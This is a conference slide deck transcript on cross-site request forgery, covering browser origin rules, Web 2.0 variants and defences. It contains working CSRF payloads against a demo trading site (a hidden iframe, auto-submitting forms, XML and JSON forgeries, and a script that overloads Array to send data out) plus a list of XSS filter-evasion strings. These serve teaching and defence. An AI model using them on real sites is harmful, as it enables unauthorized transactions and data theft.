Session J7 Demo
CSRF: The Biggest Little
Vulnerability on the Web
Who Am I?                                             http://shreeraj.blogspot.com
                                       ...
Both real and possible

 It all can happen while you are
 browsing without your consent
 –   Bank account transfer
 –   Bu...
Myth…

We have authentication in place
We do proper session
management
We are over SSL and entertain
just POST requests
We...
How?

All popular browsers can
make Cross Domain Calls
Browsers do replay cookies to
same domain
Browser manages
authentic...
Demo

Quick look at the case of
Stock trading portal
Adding stocks to portfolio ☺




                               © Blu...
Agenda
  State of Application Security and Role of
  CSRF
  CSRF Introduction and Cross Domain Calls
  CSRF attack
  CSRF ...
Application Security State
    CSRF on the rise




                             © Blueinfy Solutions Pvt. Ltd.
Hacks & Attacks




                  © Blueinfy Solutions Pvt. Ltd.
Attack vectors and types




Source: Web Application Security Consortium (WASC)
                                          ...
Trends…

Server side hacking is getting
tougher with central defense
Attacks on client side – XSS and
CSRF
Helps in identi...
CSRF – “Sleeping giant”

  “Sleeping giant is still a giant”
  Entered into OWASP top 10 and Mitre
  Corp.'s Common Vulner...
Real Cases and Attacks




                         © Blueinfy Solutions Pvt. Ltd.
Web 2.0 – Adding fuel to the fire
      80% of companies are investing
      in Web Services as part of their
      Web 2....
Root cause of Vulnerabilities
CSRF is somewhere
in-between                       CSI Security Survey : Vulnerability Distr...
CSRF – Basics




                © Blueinfy Solutions Pvt. Ltd.
CSRF

Cross Site Request Forgery
(CSRF) also known as XSRF
Several other names to same
vector like – “sea surf”,
session r...
CSRF scenario



                     Login request               Web app

                                               ...
CSRF scenario



                     Transaction page            Web app

                                               ...
CSRF scenario
                              Malicious
                                Site
     Browse
                   ...
CSRF scenario
                               Malicious
                                 Site
     Browse
                 ...
Cross Domain Call

Why? – Cross Domain Calls
work
What about Same Origin
Policy (SOP)?
Is it a bypass to it? – For
CSRF su...
Cross Domain Access
          and
Same Origin Policy (SOP)




                           © Blueinfy Solutions Pvt. Ltd.
Cross Domain
Browser & Cross domain access
– an issue
How to access cross domain
information from the browser?
Browsers ar...
Same Origin Policy

Same origin policy is followed by
all browsers
The policy dates from Netscape
Navigator 2.0.
Two pages...
Example

http://example.com/dir1/foo.asp
http://example.com/dir2/me.asp
[Success]
https://example.com/cool.asp [Fail-
prot...
Should not work


                                              trade.example.com
                        Login (user/pass...
Request generation

IMG SRC
 <img src=quot;http://host/?commandquot;>

SCRIPT SRC
<script src=quot;http://host/?commandquo...
Request generation

'Image' Object
  <script>
  var foo = new Image();
  foo.src =
quot;http://host/?commandquot;;
  </scr...
Request generation

  It is possible to generate POST as
  well
  Form can be build dynamically
  and button click from Ja...
CSRF Attack




              © Blueinfy Solutions Pvt. Ltd.
Attacking with CSRF




                      © Blueinfy Solutions Pvt. Ltd.
Logging in
POST /trade/login.aspx HTTP/1.1                                             HTTP/1.x 200 OK
Host: trade.example...
Placing an order




GET /trade/buy.aspx?symbol=MSFT&units=75&Submit=Submit HTTP/1.1
Host: trade.example.com
User-Agent: M...
Victim on another site


<html>
<head></head>
<body>
Welcome to our auction portal. We have some great products for which ...
Victim with POST request
<FORM NAME=quot;buyquot; action=quot;./buy.aspxquot;
   METHOD=quot;GETquot;>
    <input type=quo...
Obfuscation to bypass controls
     ';alert(String.fromCharCode(8
     8,83,83))//';alert(String.fromC
     harCode(88,83,...
Obfuscation to bypass controls

     <SCRIPT
     SRC=http://url/xss.js></SCRIPT>
     <IMG SRC=quot;javascript:alert('XSS...
Obfuscation to bypass controls

     <IMG
     SRC=javascript:alert(String.fromCharC
     ode(88,83,83))>
     Unicode enc...
Obfuscation to bypass controls

     UTF-8 - <IMG
     SRC=&#0000106&#0000097&#000011
     8&#0000097&#0000115&#0000099&#0...
Obfuscation to bypass controls

     Hex - <IMG
     SRC=&#x6A&#x61&#x76&#x61&#x73&
     #x63&#x72&#x69&#x70&#x74&#x3A&#
 ...
CSRF and Web 2.0




                   © Blueinfy Solutions Pvt. Ltd.
Web 2.0 and CSRF

Web 2.0 applications can be
vulnerable to different type of
CSRF
It can be with different
structures
One...
Architecture




               © Blueinfy Solutions Pvt. Ltd.
Architecture - Layers

       Browser         Structures      Protocols    Server-Side

                                  ...
Web 2.0 Changes
Application Infrastructure

        Vector                Web 1.0                   Web 2.0
 Protocols    ...
Ajax/RIA call

      Asynchronous JavaScript and
      XML
 HTML / CSS / Flash         Database / Resource

      JS / DOM...
Web 2.0 Structures
        &
Cross Domain Calls




                     © Blueinfy Solutions Pvt. Ltd.
Application Structures

 Ajax running with various different
 structures
 Developers are adding various different
 calls a...
CSRF with various streams
                   JSON



         XML          JS-Script



                          JS-Objec...
Addressing Cross Domain Calls –
        CSRF opening
     Cross Domain calls are very
     important for Web 2.0
     appl...
Cross Domain with proxy




                          © Blueinfy Solutions Pvt. Ltd.
Callback Implementation




• Portals like yahoo and google are supporting this.
• Possible to bypass the SOP and make Cro...
CSRF for 2.0




               © Blueinfy Solutions Pvt. Ltd.
Cross Site Request Forgery (CSRF)

      What is different with Web 2.0
      –   Is it possible to do CSRF to XML
       ...
One Way CSRF Scenario




                        © Blueinfy Solutions Pvt. Ltd.
One Way CSRF Scenario




                        © Blueinfy Solutions Pvt. Ltd.
One Way CSRF Scenario




                        © Blueinfy Solutions Pvt. Ltd.
One Way CSRF Scenario




                        © Blueinfy Solutions Pvt. Ltd.
One-Way CSRF




               © Blueinfy Solutions Pvt. Ltd.
One-Way CSRF
<html>
<body>
<FORM NAME=quot;buyquot; ENCTYPE=quot;text/plainquot;
   action=quot;http://trade.example.com/x...
Forcing XML

Splitting XML stream in the
form.
Possible through XForms as
well.
Similar techniques is
applicable to JSON a...
Similar with JSON
{quot;symbolquot;: quot;MSFTquot;, quot;unitsquot;: quot;20quot;, quot;commentquot;: quot;nonequot;}

<F...
Two-Way CSRF

One-Way – Just making forceful
request.
Two-Way
–   Reading the data coming from the
    target
–   May be g...
Two-Way CSRF




               © Blueinfy Solutions Pvt. Ltd.
Two-Way CSRF




               © Blueinfy Solutions Pvt. Ltd.
Two-Way CSRF

Application is serving various
streams like – JSON, JS-
Object, Array etc.




                             ...
Two-Way CSRF

Attacker page can make
cross domain request using
SCRIPT (firefox)
Following code can overload
the array str...
Two-Way CSRF




               © Blueinfy Solutions Pvt. Ltd.
Two-Way CSRF

It is possible to overload
these objects.
Reading and sending to cross
domain possible.
Opens up two way cha...
Scenario
                              JSON      Vulnerable stream coming
               Blog            feed     through ...
Web 2.0 Components

There are various other
components for Web 2.0
Applications – Can serve as
CSRF payload
 –   RSS feeds...
RSS feeds

RSS feeds coming into
application from various un-
trusted sources.
Feed readers are part of 2.0
Applications.
...
RSS feeds




            © Blueinfy Solutions Pvt. Ltd.
Mashups

API exposure for Mashup supplier
application.
Cross Domain access by callback
may cause CSRF.
Mashup application ...
Widgets/Gadgets

DOM sharing model can
cause many security issues.
One widget can change
information on another widget
– p...
Blogs

Blogs are common to Web
2.0 applications.
Many applications are
plugging third party blogs
One needs to check these...
Defense against CSRF




                       © Blueinfy Solutions Pvt. Ltd.
Unique tokens

   URL tokens – dynamically generated
   Form tokens – hidden

<input type=quot;submitquot; class=quot;subm...
Captchas

Can have image/text based
captchas for important forms
This will add protection
against CSRFs
Banking and financ...
Referer check

Checking referrer to identify
from where requests are
coming
Same domain or request from
specific resource ...
Session and Logout

Client side – self defense
–   Logout after activities at earliest
–   Doing banking and other critica...
Web 2.0 Specific
Server Side Checks
–   Check for client’s content-type.
–   XHR calls – xml/application.
–   Native calls...
Warning

Discussed countermeasures are
not bullet proof but raise the bar
There is no perfect security for
CSRF – browsers...
Conclusion

CSRF is indeed a sleeping giant
Understanding is important and
need to put countermeasures at
code level
No fu...
http://shreeraj.blogspot.com
            http://shreeraj.blogspot.com
             shreeraj@blueinfy.com
            shree...
Upcoming SlideShare
Loading in...5
×

[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web

9,588

Published on

Published in: Technology
1 Comment
8 Likes
Statistics
Notes
No Downloads
Views
Total Views
9,588
On Slideshare
0
From Embeds
0
Number of Embeds
23
Actions
Shares
0
Downloads
0
Comments
1
Likes
8
Embeds 0
No embeds

No notes for slide

Transcript of "[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web "

  1. 1. Session J7 Demo CSRF: The Biggest Little Vulnerability on the Web
  2. 2. Who Am I? http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.com Founder & Director – Blueinfy Solutions Pvt. Ltd. (Brief) – SecurityExposure.com Past experience – Net Square, Chase, IBM & Foundstone Interest – Web security research Published research – Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc. – Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. – Advisories - .Net, Java servers etc. Books (Author) – Web 2.0 Security – Defending Ajax, RIA and SOA – Hacking Web Services – Web Hacking © Blueinfy Solutions Pvt. Ltd.
  3. 3. Both real and possible It all can happen while you are browsing without your consent – Bank account transfer – Buy call for stocks – Password changes on your email account – Placing an order on your online auction site – ….more…. © Blueinfy Solutions Pvt. Ltd.
  4. 4. Myth… We have authentication in place We do proper session management We are over SSL and entertain just POST requests We use secure browser © Blueinfy Solutions Pvt. Ltd.
  5. 5. How? All popular browsers can make Cross Domain Calls Browsers do replay cookies to same domain Browser manages authentications as well CSRF © Blueinfy Solutions Pvt. Ltd.
  6. 6. Demo Quick look at the case of Stock trading portal Adding stocks to portfolio ☺ © Blueinfy Solutions Pvt. Ltd.
  7. 7. Agenda State of Application Security and Role of CSRF CSRF Introduction and Cross Domain Calls CSRF attack CSRF and Web 2.0 Defense against CSRF Conclusion We will have concepts, examples and demos © Blueinfy Solutions Pvt. Ltd.
  8. 8. Application Security State CSRF on the rise © Blueinfy Solutions Pvt. Ltd.
  9. 9. Hacks & Attacks © Blueinfy Solutions Pvt. Ltd.
  10. 10. Attack vectors and types Source: Web Application Security Consortium (WASC) © Blueinfy Solutions Pvt. Ltd.
  11. 11. Trends… Server side hacking is getting tougher with central defense Attacks on client side – XSS and CSRF Helps in identity stealing Both exploits and framework are available © Blueinfy Solutions Pvt. Ltd.
  12. 12. CSRF – “Sleeping giant” “Sleeping giant is still a giant” Entered into OWASP top 10 and Mitre Corp.'s Common Vulnerability and Exposures (CVE) list XSS and CSRF can be twin evils Having XSS one gets CSRF free any way CSRF defense is difficult © Blueinfy Solutions Pvt. Ltd.
  13. 13. Real Cases and Attacks © Blueinfy Solutions Pvt. Ltd.
  14. 14. Web 2.0 – Adding fuel to the fire 80% of companies are investing in Web Services as part of their Web 2.0 initiative (McKinsey 2007 Global Survey) By the end of 2007, 30 percent of large companies have some kind of Web 2.0-based business initiative up and running. (Gartner) 2008. Web Services or Service- Oriented Architecture (SOA) would surge ahead. (Gartner) © Blueinfy Solutions Pvt. Ltd.
  15. 15. Root cause of Vulnerabilities CSRF is somewhere in-between CSI Security Survey : Vulnerability Distribution Protocol? Browser? misconfiguration, Programming? other problems 36% programming errors 64% misconfiguration, other problems programming errors © Blueinfy Solutions Pvt. Ltd.
  16. 16. CSRF – Basics © Blueinfy Solutions Pvt. Ltd.
  17. 17. CSRF Cross Site Request Forgery (CSRF) also known as XSRF Several other names to same vector like – “sea surf”, session ridding, One click attack etc… Results are same © Blueinfy Solutions Pvt. Ltd.
  18. 18. CSRF scenario Login request Web app Web app DB Web Web Client Web app Authenticated Server SESSID=190832mkidw DB Session id given Web app Banking Application © Blueinfy Solutions Pvt. Ltd.
  19. 19. CSRF scenario Transaction page Web app Web app DB Web Web Client Web app Transaction done Server DB SESSID=190832mkidw On session id Web app Banking Application © Blueinfy Solutions Pvt. Ltd.
  20. 20. CSRF scenario Malicious Site Browse Load a Web app page Web app DB Web Web Client Web app Server SESSID=190832mkidw DB Web app Banking Application © Blueinfy Solutions Pvt. Ltd.
  21. 21. CSRF scenario Malicious Site Browse Load a page Web app Forced Web app DB Web Web Client Transaction page Web app Server DB SESSID=190832mkidw Transaction done Web app on session id Banking Application © Blueinfy Solutions Pvt. Ltd.
  22. 22. Cross Domain Call Why? – Cross Domain Calls work What about Same Origin Policy (SOP)? Is it a bypass to it? – For CSRF success. © Blueinfy Solutions Pvt. Ltd.
  23. 23. Cross Domain Access and Same Origin Policy (SOP) © Blueinfy Solutions Pvt. Ltd.
  24. 24. Cross Domain Browser & Cross domain access – an issue How to access cross domain information from the browser? Browsers are following same origin policy. This policy protect browser from security and privacy access Ajax and RIA brought this issue on front end It is important for them to access cross domain resources. © Blueinfy Solutions Pvt. Ltd.
  25. 25. Same Origin Policy Same origin policy is followed by all browsers The policy dates from Netscape Navigator 2.0. Two pages to have the same origin if the protocol, port (if given), and host are the same for both pages. document.domain – DOM reference point © Blueinfy Solutions Pvt. Ltd.
  26. 26. Example http://example.com/dir1/foo.asp http://example.com/dir2/me.asp [Success] https://example.com/cool.asp [Fail- protocol] http://example.com:8080/foo.asp [Fail- port] http://apple.com/ [Fail-host] Origin check is there by comparing with document.domain – Part of DOM © Blueinfy Solutions Pvt. Ltd.
  27. 27. Should not work trade.example.com Login (user/pass) Trading Site Client Authentication Cookie Trading Page X News Site cnn.com © Blueinfy Solutions Pvt. Ltd.
  28. 28. Request generation IMG SRC <img src=quot;http://host/?commandquot;> SCRIPT SRC <script src=quot;http://host/?commandquot;> IFRAME SRC <iframe src=quot;http://host/?commandquot;> © Blueinfy Solutions Pvt. Ltd.
  29. 29. Request generation 'Image' Object <script> var foo = new Image(); foo.src = quot;http://host/?commandquot;; </script> © Blueinfy Solutions Pvt. Ltd.
  30. 30. Request generation It is possible to generate POST as well Form can be build dynamically and button click from JavaScript is possible <script type=quot;text/javascriptquot; language=quot;JavaScriptquot;> document.foo.submit(); </script> © Blueinfy Solutions Pvt. Ltd.
  31. 31. CSRF Attack © Blueinfy Solutions Pvt. Ltd.
  32. 32. Attacking with CSRF © Blueinfy Solutions Pvt. Ltd.
  33. 33. Logging in POST /trade/login.aspx HTTP/1.1 HTTP/1.x 200 OK Host: trade.example.com Date: Mon, 23 Jul 2007 04:10:29 GMT User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 Server: Microsoft-IIS/6.0 Accept: X-Powered-By: ASP.NET text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,tex X-AspNet-Version: 2.0.50727 t/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Set-Cookie: Accept-Encoding: gzip,deflate ASP.NET_SessionId=mvoik245bzlfom55dxjsxoe1; Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 path=/; Keep-Alive: 300 Cache-Control: private Connection: keep-alive Content-Type: text/html; charset=utf-8 Referer: http://trade.example.com/trade/login.aspx Content-Type: application/x-www-form-urlencoded Content-Length: 34 user=rob&pass=iamrob&Submit=Submit © Blueinfy Solutions Pvt. Ltd.
  34. 34. Placing an order GET /trade/buy.aspx?symbol=MSFT&units=75&Submit=Submit HTTP/1.1 Host: trade.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0. 8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://trade.example.com/trade/trade.html Cookie: ASP.NET_SessionId= mvoik245bzlfom55dxjsxoe1 © Blueinfy Solutions Pvt. Ltd.
  35. 35. Victim on another site <html> <head></head> <body> Welcome to our auction portal. We have some great products for which you can bid. <br> Enjoy! <iframe src='http://trade.example.com/trade/buy.aspx?symbol=GOOG&units=50‘ id='xsfr' name='CSRF' style=quot;width:0px; height:0px; border: 0pxquot;> </body> </html> GET /trade/buy.aspx?symbol=GOOG&units=50 HTTP/1.1 Host: trade.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai n;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://CSRF.example.com/trade/CSRF.html Cookie: ASP.NET_SessionId=x5r1a355eppt5k454kjmx245 © Blueinfy Solutions Pvt. Ltd.
  36. 36. Victim with POST request <FORM NAME=quot;buyquot; action=quot;./buy.aspxquot; METHOD=quot;GETquot;> <input type=quot;hiddenquot; name=quot;symbolquot; value=quot;GOOGquot;> <input type=quot;hiddenquot; name=quot;unitsquot; value=quot;50quot;> </FORM> <script>document.buy.submit();</script> POST /trade/buy.aspx HTTP/1.1 Host: trade.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0 .8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://CSRF.example.com/trade/buy.html Content-Type: application/x-www-form-urlencoded Content-Length: 20 symbol=GOOG&units=50 © Blueinfy Solutions Pvt. Ltd.
  37. 37. Obfuscation to bypass controls ';alert(String.fromCharCode(8 8,83,83))//';alert(String.fromC harCode(88,83,83))//quot;;alert(St ring.fromCharCode(88,83,83) )//quot;;alert(String.fromCharCod e(88,83,83))//-- ></SCRIPT>quot;>'><SCRIPT>al ert(String.fromCharCode(88,8 3,83))</SCRIPT> © Blueinfy Solutions Pvt. Ltd.
  38. 38. Obfuscation to bypass controls <SCRIPT SRC=http://url/xss.js></SCRIPT> <IMG SRC=quot;javascript:alert('XSS');quot;> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;) > <IMG SRC=`javascript:alert(quot;XSSquot;)`> Image tag malformed - <IMG quot;quot;quot;><SCRIPT>alert(quot;XSSquot;)</SCRIPT>quot; > © Blueinfy Solutions Pvt. Ltd.
  39. 39. Obfuscation to bypass controls <IMG SRC=javascript:alert(String.fromCharC ode(88,83,83))> Unicode encoding - <IMG SRC=javas cript&#58 ;alert&#4 0;'XSS')> © Blueinfy Solutions Pvt. Ltd.
  40. 40. Obfuscation to bypass controls UTF-8 - <IMG SRC=&#0000106&#0000097&#000011 8&#0000097&#0000115&#0000099&#0 000114&#0000105&#0000112&#00001 16&#0000058&#0000097&#0000108&# 0000101&#0000114&#0000116&#0000 040&#0000039&#0000088&#0000083& #0000083&#0000039&#0000041> © Blueinfy Solutions Pvt. Ltd.
  41. 41. Obfuscation to bypass controls Hex - <IMG SRC=&#x6A&#x61&#x76&#x61&#x73& #x63&#x72&#x69&#x70&#x74&#x3A&# x61&#x6C&#x65&#x72&#x74&#x28&#x 27&#x58&#x53&#x53&#x27&#x29> XSS breakup - <IMG SRC=quot;jav ascript:alert('XSS');quot;> <IMG SRC=quot;jav ascript:alert('XSS');quot;> © Blueinfy Solutions Pvt. Ltd.
  42. 42. CSRF and Web 2.0 © Blueinfy Solutions Pvt. Ltd.
  43. 43. Web 2.0 and CSRF Web 2.0 applications can be vulnerable to different type of CSRF It can be with different structures One needs to look at it as well © Blueinfy Solutions Pvt. Ltd.
  44. 44. Architecture © Blueinfy Solutions Pvt. Ltd.
  45. 45. Architecture - Layers Browser Structures Protocols Server-Side JSON-RPC Ajax Flash / RIA Services XML REST HTML/CSS JavaScript SaaS JSON XML-RPC Widget DOM Open APIs SOAP HTTP(S) © Blueinfy Solutions Pvt. Ltd.
  46. 46. Web 2.0 Changes Application Infrastructure Vector Web 1.0 Web 2.0 Protocols HTTP & HTTPS SOAP, XML-RPC, REST etc. over HTTP & HTTPS Information HTML transfer XML, JSON, JS Objects etc. structures Communication Synchronous Asynchronous & Cross methods Postback domains Refresh and Redirect (proxy) Information sharing Single place Multiple sources (Urge for information (No integrated urge for integration) information platform) © Blueinfy Solutions Pvt. Ltd.
  47. 47. Ajax/RIA call Asynchronous JavaScript and XML HTML / CSS / Flash Database / Resource JS / DOM XML / Middleware / Text XMLHttpRequest (XHR) Web Server Asynchronous over HTTP(S) © Blueinfy Solutions Pvt. Ltd.
  48. 48. Web 2.0 Structures & Cross Domain Calls © Blueinfy Solutions Pvt. Ltd.
  49. 49. Application Structures Ajax running with various different structures Developers are adding various different calls and methods for it JavaScript can talk with back end sources Mashups application talking with various sources It has significant security impact. JSON, Array, JS-Object etc Identifying and Discovery of structures and CSRF © Blueinfy Solutions Pvt. Ltd.
  50. 50. CSRF with various streams JSON XML JS-Script JS-Object JS-Array © Blueinfy Solutions Pvt. Ltd.
  51. 51. Addressing Cross Domain Calls – CSRF opening Cross Domain calls are very important for Web 2.0 applications. – Proxy to talk with cross domain – Callback implementation to fetch them – Flash via crossdomain.xml These are types of bypass and can have security implications Source of the information – key! © Blueinfy Solutions Pvt. Ltd.
  52. 52. Cross Domain with proxy © Blueinfy Solutions Pvt. Ltd.
  53. 53. Callback Implementation • Portals like yahoo and google are supporting this. • Possible to bypass the SOP and make Cross Domain Calls • Security at stake [Browser layer] © Blueinfy Solutions Pvt. Ltd.
  54. 54. CSRF for 2.0 © Blueinfy Solutions Pvt. Ltd.
  55. 55. Cross Site Request Forgery (CSRF) What is different with Web 2.0 – Is it possible to do CSRF to XML stream – How? – It will be POST hitting the XML processing resources like Web Services – JSON CSRF is also possible – Interesting check to make against application and Web 2.0 resources © Blueinfy Solutions Pvt. Ltd.
  56. 56. One Way CSRF Scenario © Blueinfy Solutions Pvt. Ltd.
  57. 57. One Way CSRF Scenario © Blueinfy Solutions Pvt. Ltd.
  58. 58. One Way CSRF Scenario © Blueinfy Solutions Pvt. Ltd.
  59. 59. One Way CSRF Scenario © Blueinfy Solutions Pvt. Ltd.
  60. 60. One-Way CSRF © Blueinfy Solutions Pvt. Ltd.
  61. 61. One-Way CSRF <html> <body> <FORM NAME=quot;buyquot; ENCTYPE=quot;text/plainquot; action=quot;http://trade.example.com/xmlrpc/trade.r emquot; METHOD=quot;POSTquot;> <input type=quot;hiddenquot; name='<?xml version' value='quot;1.0quot;?><methodCall><methodName>sto cks.buy</methodName><params><param><val ue><string>MSFT</string></value></param><p aram><value><double>26</double></value></ param></params></methodCall>'> </FORM> <script>document.buy.submit();</script> </body> </html> © Blueinfy Solutions Pvt. Ltd.
  62. 62. Forcing XML Splitting XML stream in the form. Possible through XForms as well. Similar techniques is applicable to JSON as well. © Blueinfy Solutions Pvt. Ltd.
  63. 63. Similar with JSON {quot;symbolquot;: quot;MSFTquot;, quot;unitsquot;: quot;20quot;, quot;commentquot;: quot;nonequot;} <FORM NAME=quot;buyquot; ENCTYPE=quot;text/plainquot; action=quot;http://trade.example.com/trade/ajax-buy/buy.aspxquot; METHOD=quot;POSTquot;> <input type=quot;hiddenquot; name='{quot;symbolquot;: quot;MSFTquot;, quot;unitsquot;: quot;20quot;, quot;commentquot;: quot;' value='noquot;}'> </FORM> <script>document.buy.submit();</script> POST /trade/ajax-buy/buy.aspx HTTP/1.1 Host: trade.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://trade.example.com/trade/json-buy/json-CSRF.html Content-Type: text/plain Content-Length: 53 {quot;symbolquot;: quot;MSFTquot;, quot;unitsquot;: quot;20quot;, quot;commentquot;: quot;=noquot;} © Blueinfy Solutions Pvt. Ltd.
  64. 64. Two-Way CSRF One-Way – Just making forceful request. Two-Way – Reading the data coming from the target – May be getting hold onto important information – profile, statements, numbers etc. – Is it possible with JSON/XML © Blueinfy Solutions Pvt. Ltd.
  65. 65. Two-Way CSRF © Blueinfy Solutions Pvt. Ltd.
  66. 66. Two-Way CSRF © Blueinfy Solutions Pvt. Ltd.
  67. 67. Two-Way CSRF Application is serving various streams like – JSON, JS- Object, Array etc. © Blueinfy Solutions Pvt. Ltd.
  68. 68. Two-Way CSRF Attacker page can make cross domain request using SCRIPT (firefox) Following code can overload the array stream. function Array() { var obj = this; var index = 0; for(j=0;j<4;j++){ obj[index++] setter = spoof; } } function spoof(x){ send(x.toString()); } © Blueinfy Solutions Pvt. Ltd.
  69. 69. Two-Way CSRF © Blueinfy Solutions Pvt. Ltd.
  70. 70. Two-Way CSRF It is possible to overload these objects. Reading and sending to cross domain possible. Opens up two way channel for an attacker. Web 2.0 streams are vulnerable to these attacks. © Blueinfy Solutions Pvt. Ltd.
  71. 71. Scenario JSON Vulnerable stream coming Blog feed through proxy Posting to the site [Malicious code] proxy Web app DB attacker Web Server Web app JSON Web Client CSRF Target © Blueinfy Solutions Pvt. Ltd.
  72. 72. Web 2.0 Components There are various other components for Web 2.0 Applications – Can serve as CSRF payload – RSS feeds – Mashups – Widgets – Blogs – Flash based components © Blueinfy Solutions Pvt. Ltd.
  73. 73. RSS feeds RSS feeds coming into application from various un- trusted sources. Feed readers are part of 2.0 Applications. Vulnerable to XSS or CSRF. Malicious code can be executed on the browser. Several vulnerabilities reported. © Blueinfy Solutions Pvt. Ltd.
  74. 74. RSS feeds © Blueinfy Solutions Pvt. Ltd.
  75. 75. Mashups API exposure for Mashup supplier application. Cross Domain access by callback may cause CSRF. Mashup application can be man in the middle so can’t trust or must be trusted one. © Blueinfy Solutions Pvt. Ltd.
  76. 76. Widgets/Gadgets DOM sharing model can cause many security issues. One widget can change information on another widget – possible. CSRF injection through widget code. © Blueinfy Solutions Pvt. Ltd.
  77. 77. Blogs Blogs are common to Web 2.0 applications. Many applications are plugging third party blogs One needs to check these blogs – CSRF is common with blogging applications. © Blueinfy Solutions Pvt. Ltd.
  78. 78. Defense against CSRF © Blueinfy Solutions Pvt. Ltd.
  79. 79. Unique tokens URL tokens – dynamically generated Form tokens – hidden <input type=quot;submitquot; class=quot;submitquot; value=quot;Loginquot; /> <input type=quot;hiddenquot; name=quot;formTokenquot; value=quot;d5cb8550af604bfb103dae89445fde69quot;> © Blueinfy Solutions Pvt. Ltd.
  80. 80. Captchas Can have image/text based captchas for important forms This will add protection against CSRFs Banking and financial applications can add several transaction ids for users © Blueinfy Solutions Pvt. Ltd.
  81. 81. Referer check Checking referrer to identify from where requests are coming Same domain or request from specific resource should be entertained Referer: http://www.google.com/ © Blueinfy Solutions Pvt. Ltd.
  82. 82. Session and Logout Client side – self defense – Logout after activities at earliest – Doing banking and other critical operations from separate browser – Browsing from VM On server side session duration should be small © Blueinfy Solutions Pvt. Ltd.
  83. 83. Web 2.0 Specific Server Side Checks – Check for client’s content-type. – XHR calls – xml/application. – Native calls – text/html. – Filtering is possible on it. Client Side Checks – Stream can be started and terminated by /* or any predefined characters. – Client can remove them before injecting to DOM. © Blueinfy Solutions Pvt. Ltd.
  84. 84. Warning Discussed countermeasures are not bullet proof but raise the bar There is no perfect security for CSRF – browsers are designed and work that allows CSR XSS on the site gives a leverage for CSRF - No XSS! © Blueinfy Solutions Pvt. Ltd.
  85. 85. Conclusion CSRF is indeed a sleeping giant Understanding is important and need to put countermeasures at code level No full proof defense available but there are ways to protect applications or part of applications Web 2.0 – adds new dimension to CSRF © Blueinfy Solutions Pvt. Ltd.
  86. 86. http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.com Questions © Blueinfy Solutions Pvt. Ltd.

×